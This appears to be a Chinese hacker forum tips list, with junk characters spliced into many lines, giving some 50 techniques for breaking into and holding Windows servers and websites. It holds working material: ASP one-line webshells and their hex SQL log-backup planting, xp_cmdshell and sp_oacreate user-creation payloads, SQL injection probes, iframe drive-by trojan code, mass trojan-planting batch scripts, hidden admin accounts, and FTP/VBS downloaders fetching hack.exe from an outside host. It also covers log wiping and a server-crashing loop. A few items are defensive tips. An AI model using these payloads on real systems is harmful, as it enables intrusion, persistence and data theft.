1、Xp系统修改权限防止病毒或木马等破坏系统,cmd下,) t& E3 C, _0 _
cacls C:\windows\system32 /G hqw20:R
" s6 r& C% {, p l& K0 t思是给hqw20这个用户只能读取SYSTEM32目录,但不能进行修改或写入# O( G) N' j6 k: [% p7 _/ Z7 v
恢复方法:C:\>cacls C:\windows\system32 /G hqw20:F( s$ j, ^4 b! o' a
: Y S5 u1 z: f" B/ F9 \2、用Microsoft自带的IExpress工具作的捆绑木马可以躲过很多杀毒软件,运行对话框中输入Iexpress。
- J0 M6 t& ~3 W
, n- A& J& S6 H+ I- z2 g% p$ J5 z3、内网使用灰鸽子,肉鸡上vidcs.exe -p端口,本地VIDCS里,VIDCS服务IP 填肉鸡的IP,VIDCS服务端口,就是给肉鸡开的端口,BINDIP添自己的内网IP,BIND端口 添8000,映射端口添8000。2 Q8 ?& ^6 H. y$ H3 S& a
% M: R: g/ l3 G# J4 e4、建立隐藏帐号,上次总结了用guest建立隐藏的管理员,这次再介绍一种,在cmd下建立一个ating$的用户,然后注册表下复制管理员的1F4里的F 值到ating$的F值,再把ating$改为$,这样在计算机管理的用户里看不到这个隐藏帐号
( ^! H, A* j0 ^3 E" q8 }; A* r4 x) E9 c" q7 V1 n5 x
5、利用INF文件来修改注册表
5 @" o. @! O. @! M[Version], Q: w+ H5 D+ X6 X8 E. O6 g
Signature="$CHICAGO$"
' h9 ?) Q) c o: K1 D+ Z0 h[Defaultinstall]
9 Y$ ^- W D( S8 u2 vaddREG=Ating% C9 q- [$ c/ y* t
[Ating]: W, }3 J- x C4 ^. A
HKCU,"Software\Microsoft\Windows\CurrentVersion\Policies\system","disableregistrytools","0x00010001","1"$ I, I; O- b- y5 n. K
以上代码保存为inf格式,注意没有换行符,在命令行里导入inf的命令如下:
; h: ?1 h" q6 erundll32.exe setupapi.dll,InstallHinfSection DefaultInstall 128 inf文件的具体路径
' @1 L4 ^5 @8 _' e8 Q其中HKEY_CLASSES_ROOT 简写为 HKCR,HKEY_CURRENT_USER 简写为 HKCU
/ c$ M. l( r% ^$ S2 {HKEY_LOCAL_MACHINE 简写为 HKLM,HKEY_USERS 简写为 HKU
: z/ q0 b% B; \5 o& jHKEY_CURRENT_CONFIG 简写为 HKCC( G# G2 p. c- N3 P! f
0x00000000 代表的是 字符串值,0x00010001 代表的是 DWORD值 q6 O. p8 e+ N6 f8 u* M/ R/ @
"1"这里代表是写入或删除注册表键值中的具体数据9 w* K3 M5 `# W3 T
. g' x3 \1 E$ j6、关于制作穿xp2防火墙的radmin,大家一定要会,各大黑客网站都有动画,0 `* U8 o. h0 y( v& _" R4 \
多了一步就是在防火墙里添加个端口,然后导出其键值
, v( {; p* G. | h[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List]' k' W U/ }* w8 F, V7 v+ x
, k% Y+ {2 n& L6 |& l7、系统启动时Alerter服务启动前启动木马程序ating.exe,此方法很隐蔽
* h' Y/ S# ]+ i$ i! ]( d! |6 t% n在[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CurrentVersion\Image File Execution Options]下建立service.exe项,再在service.exe项建立一个Debugger的键(字符串值),键值填ating.exe的全路径。+ M% n* l& j/ m( b5 `6 W
0 O; w- j. _- ~- ?" C4 t8、将ftp.exe传到服务器用来提权,可以先把它变成ating.gif格式的再用,迷惑管理员。* E8 v$ Z4 a8 S5 f3 r% S
- G+ v6 R5 ]- \, `( |. X9、有时候在我们进入了网站后台,但是没有上传图片和备份等功能,得不到webshell,. | R9 Q$ d$ g; B2 t
可是不能白来一场,可以看看发表公告或新闻支不支持html和script,支持的话加个frame马或者其他的什么。
% U3 A4 f; W9 F- C' f8 |2 {# A% s6 h4 O5 N; c
10、用google帮我们找网站后台,搜索”filetype:asp site:www.hack6.com inurl:login” P3 M% p. G- V9 y8 M
5 L$ } X/ \# N: l7 U8 M
11、我们中了盗密码的木马后不要急于删除,一般这些木马都是把密码发到指定邮箱,我们可以用探嗅软件来找到邮箱的用户名和密码,比如安全焦点的xsniff,
$ ~: Z- M7 O: A7 v7 E8 o) h! l用法:xsniff –pass –hide –log pass.txt/ I# _/ }$ m! m6 \
: i4 m4 l" A) e" u2 P
12、google搜索的艺术
& K$ u) `5 M% B: M搜索关键字:“未闭合的引号”或“ADODB.Field.error”或“Either BOF or EOF in True”
0 s# }; F" k |或“字符串的语法错误”可以找到很多sql注入漏洞。; m v3 z; u2 _7 l0 }/ @
4 L+ P$ h# M) d
13、还可以搜一些木马的关键字,比如搜索“管理登陆 海洋顶端 inurl:asp”,搜到了说明此网站服务器的其中网站肯定有漏洞。* J f' m1 W% t% Z; {: m
- Z# D) ~- `5 W8 g" m0 X14、cmd中输入 nc –vv –l –p 19879 ?6 i+ U) P( ?# H" ]
做个bat文件内容为sqlhello 起始ip 1433 终止ip 1987 扫鸡吃! b+ Q* b0 i- @' `% F2 k
* ^1 S( C) a5 j15、制作T++木马,先写个ating.hta文件,内容为. x2 }3 M# U' u5 \, e/ M& @
<script language="VBScript">5 q0 O X9 i7 l+ f+ E
set wshshell=createobject ("wscript.shell" )9 j& u! I; X4 r: Y, K$ {; o
a=wshshell.run("你马的名称",1)/ n& r; J, |: `" ~6 [
window.close
9 {1 D7 ^* L' V& `9 u0 t( O) v</script>
% F( D! i* G/ { z- a再用mshta生成T++木马,命令为mshta ating.hta ating.t++,用网页木马生成器生成网页木马。
$ b6 s& v' T. O2 ~# G+ q# B# M" v) `# R( X
16、搜索栏里输入
( \5 D I6 Z2 n: J& t! X关键字%'and 1=1 and '%'=', e8 H9 ?; L& H) o$ a/ r
关键字%'and 1=2 and '%'='
# G. W4 ]3 @+ a# Q. `3 W9 Q比较不同处 可以作为注入的特征字符
% V2 u# z N* ?8 Y3 K/ j8 L/ U- |% y1 C) x
17、挂马代码<html>
! n6 A! q T' Z1 ~. A<iframe src="马的地址" width="0" height="0" frameborder="0"></iframe>0 O" F; H2 x5 a
</html>2 B) R' f' i6 Q |) a4 u8 p
2 I1 p1 l |5 ]6 _7 i" W18、开启regedt32的SAM的管理员权限检查HKEY_LOCAL_MACHINE\SAM\SAM\和HKEY_LOCAL_MACHINE\SAM\SAM\下的管理员和guest的F键值,如果一样就是用被入侵过了,然后删了guest帐号,对方可以用guest帐号使用administraeors的权限,你也可以用这方法留住肉鸡, 这方法是简单克隆,
! M; E3 s( i" onet localgroup administrators还是可以看出Guest是管理员来。5 ~3 j$ t3 w _4 w7 W+ }
+ a4 l- T9 n+ Y! M19、软件instsrv.exe 把.exe文件做成系统服务来启动 用来肉鸡挂QQ等
* n9 R" r( j5 e* p8 c用法: 安装: instsrv.exe 服务名称 路径1 b4 t. P# y. e4 `, b+ ~
卸载: instsrv.exe 服务名称 REMOVE# `8 Q5 |# @$ O' g6 M f2 E# q5 Q; ?4 w% Q
$ c- N% m5 P$ [# ~- u% o; _
; j# u! ?' h6 n9 o/ j# b3 P% D, B3 b21、SQL注入时工具---Internet选项---高级里找到显示友好的错误信息勾去掉
" X1 y, Q) K: A; c( _7 Y不能注入时要第一时间想到%5c暴库。
- d/ v/ w7 A: A# F6 q, ^) A% G+ Y5 w& U% Y. C/ S C8 z, ]" j
22、很多网站程序(比如华硕中文官方网站)上传图片时有可能在检测文件的时候是 从左朝又进行检测,也就是说,他会检测文件是不是有.jpg,那么我们要是把文件改成:ating.jpg.asp试试。。由于还是ASP结尾,所以木马不会变~: G- F$ P9 }& v. o( b$ p( H a: f
" i# D5 H% i4 q# V- \
23、缺少xp_cmdshell时
6 A8 C) j. Z- p& W; q* V- x5 J尝试恢复EXEC sp_addextendedproc xp_cmdshell,@dllname='xplog70.dll'8 h2 _" Z$ _" O8 r
假如恢复不成功,可以尝试直接加用户(针对开3389的)6 z# r! \; ~; J0 s" V; g
declare @o int
: m" x4 A+ V" j; {6 Fexec sp_oacreate 'wscript.shell',@o out
+ r% ^$ @/ q6 j0 T0 x: ~2 aexec sp_oamethod @o,'run',NULL,'cmd.exe /c net user ating ating /add' 再提到管理员
6 S0 {5 v B. K N" F/ U% z7 t; g+ W
24.批量种植木马.bat
/ Q, v' G5 Q& Y7 ~for /f %%i in (扫描地址.txt) do copy pc.exe %%i\admin$ 复制木马到扫描的计算机当中' o: ~; h/ W3 N
for /f %%i in (扫描地址.txt) do at %%i 09:50 pc.exe 在对方计算机上运行木马的时间
# U1 \' \* F0 _* y扫描地址.txt里每个主机名一行 用\\开头. N3 r% w) J* u8 y) y8 H6 W
$ H9 D/ b6 j4 ~' t# D7 _25、在程序上传shell过程中,程序不允许包含<% %>标记符号的内容的文件上传,比如蓝屏最小 的asp木马<%execute request("l")%>,我们来把他的标签换一下: <script language=VBScript runat=server>execute request("l")</Script> 保存为.asp,程序照样执行。* B& R) s4 \: V( D% d
8 i2 E9 c. u# q8 u7 K! s% n4 Y0 ]# S
26、IIS6 For Windows 2003 Enterprise Edition 如IIS发布目录文件夹包含.asp后辍名.
# I$ e1 M8 n6 u" V- s, J将.asp后辍改为.jpg或其它的如.htm,也可以运行asp,但要在.asp文件夹下.
$ t: ]$ A$ M# q3 l# `5 s.cer 等后缀的文件夹下都可以运行任何后缀的asp木马
& B' ]0 b# |8 Q7 T1 k, @: C% B- n! g
4 ?" Z. s; \9 Q+ f+ J" d7 M27、telnet一台交换机 然后在telnet控制主机 控制主机留下的是交换机的IP
% N |) Y6 A* g( D- Z1 V7 Z然后用#clear logg和#clear line vty *删除日志
' ?0 L8 Z- R9 r m7 {. z) }
5 }8 w- w" N" A28、电脑坏了省去重新安装系统的方法
7 v/ @! ]0 g5 R8 K+ d纯dos下执行,5 Q8 D5 t, h6 e' v8 g3 ?
xp:copy C:\WINDOWS\repair\*.* 到 c:\windows\system32\config
9 D: H; `/ Z3 f+ p! Q! g0 f8 o2k: copy C:\winnt\repair\*.* 到 c:\winnt\system32\config
3 q4 `0 F n) ~- r0 v( j8 k& S% e1 u' w9 ~4 }0 j, g, G. i
29、解决TCP/IP筛选 在注册表里有三处,分别是:
) u6 y3 N5 b( s3 SHKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip
1 l9 q) o8 G8 n: S" gHKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip `+ W r$ h/ y2 W. |0 N3 s
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip
9 D0 T* _9 x# l1 r$ {# ?分别用
7 u& u% U @2 A8 C2 X* m1 }& Hregedit -e D:\a.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip
; F3 @5 @; l$ s/ Y7 Mregedit -e D:\b.reg HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip
4 n- Z( ?$ F" B7 q; s- m/ N" gregedit -e D:\c.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip
2 ~4 G* C o$ a' _命令来导出注册表项5 f8 g, f3 E5 F+ G' C* c9 E9 v
然后把三个文件里的EnableSecurityFilters"=dword:00000001,( p# v9 p$ J& |
改成EnableSecurityFilters"=dword:00000000 再将以上三个文件分别用
! t* `3 o6 u8 \! H: {2 Qregedit -s D:\a.reg regedit -s D:\b.reg regedit -s D:\c.reg 导入注册表即可。4 |2 `/ U L3 x% X2 f
7 X# J. B, C% a! ?30、使CHM木马无法在本地运行木马程序 将注册表"HKEY_CURRENT_U
- a }$ U; G. ]9 i7 GSER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0"下的1004项的值由原来十进制的0改为十六进制的3
1 M3 W9 Q: n7 \( v" q
$ u% X; H3 \0 N31、全手工打造开3389工具' t# R7 R f; C) y; `1 `0 {
打开记事本,编辑内容如下:4 D4 G7 N+ ?0 \' \% @# j) V- H
echo [Components] > c:\sql
' D8 i6 S! D- K) A9 J+ Q+ ~% cecho TSEnable = on >> c:\sql
% Q0 y- g6 i# x! Osysocmgr /i:c:\winnt\inf\sysoc.inf /u:c:\sql /q E" J2 X! k5 D: s0 e2 M+ Z$ y( v
编辑好后存为BAT文件,上传至肉鸡,执行8 ^0 O# Z* t1 U1 x' ` _' a
, Q0 V9 `7 `5 J$ B
32、挂马js代码document.write('<iframe height=0 width=0 src="木马地址.htm"></iframe>');保存到js页面里 可让所有页面挂马9 [# A+ C% @& }( M, L6 z9 m0 |
5 b3 S3 i4 E2 n6 f3 y S
33、让服务器重启4 `3 Q+ Y, a3 j
写个bat死循环:, x! E i& ?8 @& _! W6 }
@echo off7 }# O4 e F# f# V' c$ E
:loop1
M% _* t3 q+ W+ F" Acls
/ q. G2 n- I0 ]) x3 f& F+ kstart cmd.exe
8 b Y: b W& }: q) I- c2 \goto loop17 u# Z7 S. N7 n9 Q+ z) H" \' [/ K+ m
保存成bat guset权限就可以运行 运行后很快服务器就会死机 管理员自然会去重启! B- \! H/ u9 ?$ |9 j7 q* L
. r8 o U- u7 P& U' i I9 b+ h
34、如果你登录肉鸡的3389时发现有cmd一闪而过,那你可要小心了,管理员写了个bat在监视你,
) `9 m( r0 a( [$ @! e0 s# W: y/ d@echo off8 z7 z6 B+ j* U/ N& G5 A! i/ ]
date /t >c:/3389.txt
- H4 g/ q- @- X( e+ `8 ptime /t >>c:/3389.txt
1 c, u* O2 f( O3 @! G3 ]6 Sattrib +s +h c:/3389.bat
% r! Q$ s. `5 e* dattrib +s +h c:/3389.txt
8 Y# Q1 |9 P7 g. W7 ?9 F) Pnetstat -an |find "ESTABLISHED" |find ":3389" >>c:/3389.txt
6 Z+ [ m7 G& R4 [7 G1 ?9 v1 q并保存为3389.bat: V& U# q( [, `) L1 f
打开注册表找到:Userinit这个键值 在末尾加入3389.bat所在的位置,比如我放到C盘,就写:,c:/3389.bat,注意一定要加个逗号
4 D! Z4 f. o. R# v o, g% f# p e# w- y. p- @
35、有时候提不了权限的话,试试这个命令,在命令行里输入:* y5 B6 L$ t4 S
start http://www.hack520.org/muma.htm然后点执行。(muma.htm是你上传好的漏洞网页)0 e5 Z: D; B1 [+ t! N g9 C
输入:netstat -an | find "28876" 看看是否成功绑定,如果有就telnet上去,就有了system权限,当然也可以nc连接,本地执行命令。, Q8 p7 y6 A4 M: L
, r, M8 l/ p% {' X, C
36、在cmd下用ftp上传马方法,我们可以用echo 写一个批处理文件! _7 a4 O* b+ L& v9 R$ r
echo open 你的FTP空间地址 >c:\1.bat //输入你的FTP地址& m/ P3 ~: c% d! Y/ ]( ^4 D
echo 你的FTP账号 >>c:\1.bat //输入账号
5 e: l* S2 W5 h+ q' |$ G1 g; s Z- iecho 你的FTP密码 >>c:\1.bat //输入密码# }; \: [' S, u) v
echo bin >>c:\1.bat //登入
4 @6 s0 x3 G1 _echo get 你的木马名 c:\ ating.exe >>c:\1.bat //下载某文件到某地方并改名为什么1 V( t" C" G- X4 o% ~4 p
echo bye >>c:\1.bat //退出
5 v; }) F3 |, X5 j+ d' ?% x$ }然后执行ftp -s:c:\1.bat即可3 d- k' F2 d. K' P9 h
. _1 |1 U! |! y4 u9 w1 t' @
37、修改注册表开3389两法
2 w, O6 F( E4 z) Q/ {/ {(1)win2000下开终端 首先用ECHO写一个3389.reg文件,然后导入到注册表
8 q/ K0 [' v1 a9 g7 q3 uecho Windows Registry Editor Version 5.00 >>3389.reg5 @0 G; i3 ]8 {; u# t
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\netcache] >>3389.reg: j1 Z. o8 g- {9 X8 F# Y5 G
echo "Enabled"="0" >>3389.reg
/ }6 C' S1 M! C% U w/ ?$ T& Zecho [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows0 c3 i4 t8 D. w3 r! g
NT\CurrentVersion\Winlogon] >>3389.reg' j' R& E5 M, [2 \- r5 y3 U
echo "ShutdownWithoutLogon"="0" >>3389.reg+ B* p! i( J: v0 m. }' f) F5 ]" y/ ]
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer]& x% R7 n, g9 @1 A0 R" O' Q
>>3389.reg
: t3 }/ ?7 N. iecho "EnableAdminTSRemote"=dword:00000001 >>3389.reg
0 `4 s5 s, P- c1 o) ?9 y2 s% aecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]
f' o# f3 a# Z& Z>>3389.reg
1 v5 u2 A8 J. C% o5 t* H1 l- ?% F% Pecho "TSEnabled"=dword:00000001 >>3389.reg8 l2 x) W2 G7 S# D
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermDD] >>3389.reg! m/ H6 K7 c( B( G" d
echo "Start"=dword:00000002 >>3389.reg
4 K. k: f8 E) d' e9 l ^ mecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService]
8 ~9 L! P+ G: G4 W+ n8 Z* @( `>>3389.reg
$ B" q% Y, h$ M- K; secho "Start"=dword:00000002 >>3389.reg
; L o! {' a+ H6 _! A, P: Gecho [HKEY_USERS\.DEFAULT\Keyboard Layout\Toggle] >>3389.reg
- d5 n5 ]' N2 P' Q. {, W$ Q8 Lecho "Hotkey"="1" >>3389.reg1 A" z$ c C e* Z6 ]5 n3 _4 K; K$ k
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
/ o8 d8 h8 g$ ^Server\Wds\rdpwd\Tds\tcp] >>3389.reg: q. g2 E0 D( m: G3 ~! o1 h6 d
echo "PortNumber"=dword:00000D3D >>3389.reg7 T* {$ N8 o* I
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
# [' l- X0 }2 o5 ?, CServer\WinStations\RDP-Tcp] >>3389.reg
& U9 [' g2 E- t9 iecho "PortNumber"=dword:00000D3D >>3389.reg
- ^4 A8 B9 O7 h. r4 K9 X把这些ECHO代码到CMDSHELL下贴粘就可以生成3389.reg文件,接着regedit /s 3389.reg导入注册表。3 W: b0 X/ g5 N$ g6 T
(如果要改变终端端口只须把上面的两个D3D都改一下就可以了)' _+ K$ p4 R, w* `3 Q
因为win 2k下开终端不能像XP一样可以立即生效,而是需重启机器后才生效
f _, Q2 o1 A$ \4 ^" T9 r(2)winxp和win2003终端开启% M- `( ?3 X* C9 Y! |* c* I
用以下ECHO代码写一个REG文件:( s& ]. }8 _1 c; D' i; n
echo Windows Registry Editor Version 5.00>>3389.reg% |: }1 b2 J6 G" ^$ ?0 r8 u
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal) M; k! c' q1 R" X- b4 T) J/ G
Server]>>3389.reg- b& x3 @: ~' |9 v
echo "fDenyTSConnections"=dword:00000000>>3389.reg; x2 M3 j" T7 _* G* |+ A
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
6 L* x1 H6 d2 \9 `* f" E8 W) kServer\Wds\rdpwd\Tds\tcp]>>3389.reg3 p9 E# Q; Y, x! k# S( W n* J, N; d
echo "PortNumber"=dword:00000d3d>>3389.reg
' D) T6 u u2 [! z+ Decho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
3 S3 y% G. D1 q7 b0 CServer\WinStations\RDP-Tcp]>>3389.reg
) |' s7 L/ s R8 Y, hecho "PortNumber"=dword:00000d3d>>3389.reg. ^) U, h' m: J! S+ f. A( O d
然后regedit /s 3389.reg del 3389.reg; T* s% |: G8 l3 F
XP下不论开终端还是改终端端口都不需重启9 |8 s. u C9 K7 @, f8 y ?
& T8 l- E! ]# L) J& n+ ?1 y
38、找到SA密码为空的肉鸡一定要第一时间改SA密码,防止别人和我们抢肉吃
( Y, N& f$ w! c0 F9 e用查询分析器运行 EXEC sp_password NULL, '你要改的密码', 'sa'1 @1 p( P' N0 x J6 L2 @4 t
+ x' q9 l; n9 L+ K4 J, {. I! t39、加强数据库安全 先要声明把mdb改成asp是不能防止下载的!
+ u6 y3 d/ ~. S' G5 U* l8 L(1)数据库文件名应复杂并要有特殊字符 j M6 M/ I4 J$ Q. L
(2)不要把数据库名称写在conn.asp里,要用ODBC数据源* J4 ? `: `, s0 e5 Q3 Z( }! Y
将conn.asp文档中的
* b$ H9 l! R& VDBPath = Server.MapPath("数据库.mdb")
, e- V1 T/ @& D9 s7 Sconn.Open "driver={Microsoft Access Driver (*.mdb)};dbq=" & DBPath
7 m; f5 Q! L9 u4 Z2 V1 `$ g' s; P+ O- Y& x6 J- D$ K% d
修改为:conn.open "ODBC数据源名称," 然后指定数据库文件的位置5 ]/ e8 N, x1 U2 u. E* w
(3)不放在WEB目录里
5 F6 Q0 y X& A! D" L5 W% q5 o3 [" a
1 T O$ F$ O+ D" ~8 U40、登陆终端后有两个东东很危险,query.exe和tsadmin.exe要Kill掉/ z T8 ^; E, i4 L& h! S! g
可以写两个bat文件' l7 V; K+ w) d/ V8 L* ?( S/ B
@echo off+ ~; y0 u2 M& m/ a0 H* _
@copy c:\winnt\system32\query.exe c:\winnt\system32\com\1\que.exe
, o$ I* d- X* W' h- G@del c:\winnt\system32\query.exe$ m& p- y" q: j) c" f# s+ |
@del %SYSTEMROOT%\system32\dllcache\query.exe
1 B+ P/ X) A& F- I L' [) X@copy c:\winnt\system32\com\1\query.exe c:\winnt\system32\query.exe //复制一个假的' ?& N& t0 a: \1 Q2 M& J7 k9 c! V
6 T/ G: g2 j2 o1 }2 l
@echo off
# t7 P& X4 U% f@copy c:\winnt\system32\tsadmin.exe c:\winnt\system32\com\1\tsadmin.exe5 ~8 l7 d- T' y" M
@del c:\winnt\system32\tsadmin.exe
A- g" j1 V- Y ^9 J, ^2 F@del %SYSTEMROOT%\system32\dllcache\tsadmin.ex
: R# I, N: y% ], `3 E1 P
/ N$ S3 O. X4 `- ~* }. ~41、映射对方盘符. I1 B1 k# G4 X' n( o! t7 k; h3 W
telnet到他的机器上,
; q1 f9 O! I2 T7 {net share 查看有没有默认共享 如果没有,那么就接着运行. s/ L' n. A# O+ U: D6 V
net share c$=c:
5 ^& L6 Y | [; E. F9 z$ v4 Rnet share现在有c$" U+ m" \- X$ M2 W9 a
在自己的机器上运行
% n; \- s9 N) j: S/ k/ a) M e" Onet use k: \\*.*.*.*\c$ 把目标共享映射到本地硬盘,盘符为K
3 g5 g% Y6 M: w4 s9 F+ \- i
% F- O7 z& q4 E$ b4 E42、一些很有用的老知识
* v6 t$ v+ z4 u4 }% ~3 ]type c:\boot.ini ( 查看系统版本 )7 I* J ]6 i: o1 |) a& ^7 m
net start (查看已经启动的服务)
& N5 d9 w1 q: o; |- \! Uquery user ( 查看当前终端连接 )
* y: M6 y; n o: r- f1 [net user ( 查看当前用户 )1 R) K' P& p1 i% s1 \+ m
net user 用户 密码/add ( 建立账号 )5 S# n6 u7 N' f' g5 I7 z0 Z
net localgroup administrators 用户 /add (提升某用户为管理员)
6 {; ?' l% G, d. h8 k) |! b7 iipconfig -all ( 查看IP什么的 )
/ E. l# }7 K; H' Vnetstat -an ( 查看当前网络状态 )
- f1 b: `7 f! O8 D" ~8 |findpass 计算机名 管理员名 winlogon的pid (拿到管理员密码)
/ M5 O1 `( m8 n& F& r% I' J, R克隆时Administrator对应1F4
a9 i( R) J2 Z/ d( Tguest对应1F5
. x1 M0 \' ^$ F" n# [tsinternetuser对应3E8
" B- O$ Q7 @& T n! `" @) a( K4 \
43、如果对方没开3389,但是装了Remote Administrator Service, t' z9 g6 m+ z& z" b
用这个命令F:\ftp.exe "regedit -s F:\longyi.biz\RAdmin.reg" 连接
: T) ~5 L, d s5 F解释:用serv-u漏洞导入自己配制好的radmin的注册表信息
7 @% `1 e2 r+ \3 J1 S) y: h先备份对方的F:\ftp.exe "regedit -e F:\1.reg HKEY_LOCAL_MACHINE\SYSTEM\RAdmin"
' O: t5 X% [; T0 l, s4 p5 _
9 I& I0 b \5 t7 O1 }44、用lcx做内网端口映射,先在肉鸡上监听 lcx -listen 52 8089 (端口自定)
7 H- ]1 o% i5 r+ K @) N+ i本地上运行映射,lcx -slave 鸡的ip 52 我内网的ip 80 (我的WEB是80端口)
+ G5 g# O8 D& A4 l! ~! v( D/ i' x4 P I( Q8 z
45、在服务器写入vbs脚本下载指定文件(比如用nbsi利用注入漏洞写入)
) Y+ x' J6 `8 C4 D Z4 e5 Z) Aecho Set x= CreateObject(^"Microsoft.XMLHTTP^"):x.Open. a! s5 q/ h/ j3 ^, i
^"GET^",LCase(WScript.Arguments(0)),0:x.Send():Set s =" q" ]$ j: M! T. {% g
CreateObject(^"ADODB.Stream^"):s.Mode = 3:s.Type =
- R9 j2 [. ~; ~7 q& I6 \1:s.Open():s.Write(x.responseBody):s.SaveToFile LCase(WScript.Arguments(1)),2 >ating.vbs1 u+ r! n: ?1 N( A
(这是完整的一句话,其中没有换行符)( E1 T0 I% F* o$ V
然后下载:% b- B: V* i' w
cscript down.vbs http://www.hack520.org/hack.exe hack.exe
$ ~( O* R& t0 h* F9 P. a2 b% L( G6 v9 P
46、一句话木马成功依赖于两个条件:
# `, t/ q+ |6 W2 n- i. H1、服务端没有禁止adodb.Stream或FSO组件
7 f5 X! p1 w# V7 e2、权限问题:如果当前的虚拟目录禁止user级或everyone写入的话也是不会成功的。2 Z' f& W: Y' n* u9 ?
5 a1 s M) I8 z% Q' }+ L( i5 d
47、利用DB_OWNER权限进行手工备份一句话木马的代码:# M- o" @7 e. d0 e, p# M8 E
;alter database utsz set RECOVERY FULL--0 m+ r H- f4 {3 V- w
;create table cmd (a image)--( G5 W; J7 x7 ?" W5 b% d0 n( |4 x
;backup log utsz to disk = 'D:\cmd' with init--9 T7 o ?% \% ] ~
;insert into cmd (a) values (0x3C25657865637574652872657175657374282261222929253EDA)--
/ n2 e# e- u/ i3 M& s: f3 Z;backup log utsz to disk = 'D:\utsz_web\utsz\hacker.asp'--
) N4 S5 B( A2 o. B7 Q6 n) ]5 `0 h注:0x3C25657865637574652872657175657374282261222929253EDA为一句话木马的16进制形式。! U$ q. {- ?0 t6 h" Z
7 Z( R) q& v. s2 D& H
48、tlntadmn是telnet服务的设置命令,可以对telnet服务的端口、认证方式等进行设置:& e0 ^7 F9 R% x! w7 y
; _; u9 n B* z* E6 {, ?9 B& Q用法: tlntadmn [computer name] [common_options] start | stop | pause | continue | -s | -k | -m | config config_options" y9 Z( S+ O$ {; T
所有会话用 'all'。. X' H* ?% K: v+ s2 R3 X! f0 N3 {3 p
-s sessionid 列出会话的信息。
, X* s1 S5 N' f" X-k sessionid 终止会话。2 ]; x+ Y, a, z( R5 G( g' x
-m sessionid 发送消息到会话。
; V" R, Q# M! u% G( D2 K& a8 E+ i" s5 s: {
config 配置 telnet 服务器参数。: h* W! H m* L! G/ u
+ _( m2 k/ M- S1 U/ _3 N2 M: acommon_options 为:1 H T: V( Q% n" U" {
-u user 指定要使用其凭据的用户
" j2 S( `. p# z6 W2 z" |( Z7 w3 `-p password 用户密码) l, c9 Y4 D* M" d+ O- V
! v1 k Y8 K3 H/ Vconfig_options 为:
- y* \( A9 m5 ?& i0 @dom = domain 设定用户的默认域
/ z- x3 ]- i- a) w4 h% \5 S. D+ z2 octrlakeymap = yes|no 设定 ALT 键的映射* Q6 w3 W. I# T- ^0 D0 u$ }2 m
timeout = hh:mm:ss 设定空闲会话超时值$ A2 v5 h3 M) _3 @# C% L6 @
timeoutactive = yes|no 启用空闲会话。/ E G9 p* u) n# C8 o
maxfail = attempts 设定断开前失败的登录企图数。3 O- A7 j( \/ b2 [
maxconn = connections 设定最大连接数。/ [0 v$ l# b1 X7 I& x5 e
port = number 设定 telnet 端口。
, f; N: o, ]) Ysec = [+/-]NTLM [+/-]passwd% a) k2 l/ ?& K7 C B: w; T
设定身份验证机构
+ b% J! q/ v0 F4 o ~fname = file 指定审计文件名。
! R9 F1 `( e. D4 C' F$ b" \fsize = size 指定审计文件的最大尺寸(MB)。
3 u$ J/ g- i' ^ ~, o$ M6 E/ Qmode = console|stream 指定操作模式。
( N: w/ J3 p) c, v1 O% I$ r. gauditlocation = eventlog|file|both8 N( m& h# A0 {# t o5 c3 V/ f* j
指定记录地点
_! F/ x4 r5 l: x1 Y) P% Q/ Paudit = [+/-]user [+/-]fail [+/-]admin& U4 r1 T& h. r5 Q
6 i2 b* x) [$ H& K49、例如:在IE上访问:
1 ~: Q3 x+ N7 P9 u8 uwww.hack520.org/hack.txt就会跳转到http://www.hack520.org/
7 e8 G) ]# p# ^# z, O) {5 ^hack.txt里面的代码是:
; ^. w+ ]0 M. \) E# p<body> <META HTTP-EQUIV="Refresh" CONTENT="5;URL=http://www.hack520.org/">
, U+ P$ K) L/ W6 i7 r/ j% f7 T把这个hack.txt发到你空间就可以了!
1 _# O4 P' c Y$ l: O这个可以利用来做网马哦!
4 s% x, m5 M" v
0 E* \ ]% v6 Y7 K0 l9 K( x+ \8 g50、autorun的病毒可以通过手动限制!
( @6 [( j0 l; f; _1 ?0 }1,养成好习惯,插入U盘或移动硬盘,都要按住shift让其禁止自动运行!- J! ^# Y. y( l% g9 S! o
2,打开盘符用右键打开!切忌双击盘符~
K! p3 f" J* F9 F8 T/ M; f- s3,可以利用rar软件查看根目录下autorun病毒并删除之!他可以处理一些连右键都无法打开的分区!
$ z) r% j4 u8 Z, J z4 a4 z
" i$ P( r1 Y6 M8 r L51、log备份时的一句话木马:% l, z& z4 V$ ~3 [, n2 ?0 G' Z
a).<%%25Execute(request("go"))%%25>7 X. l3 w; d# S1 A
b).<%Execute(request("go"))%>
* L& k6 H% @* s* Tc).%><%execute request("go")%><%
0 w3 _5 K- K& D& S8 xd).<script language=VBScript runat=server>execute request("sb")</Script>
2 r8 G: U! [0 De).<%25Execute(request("l"))%25>
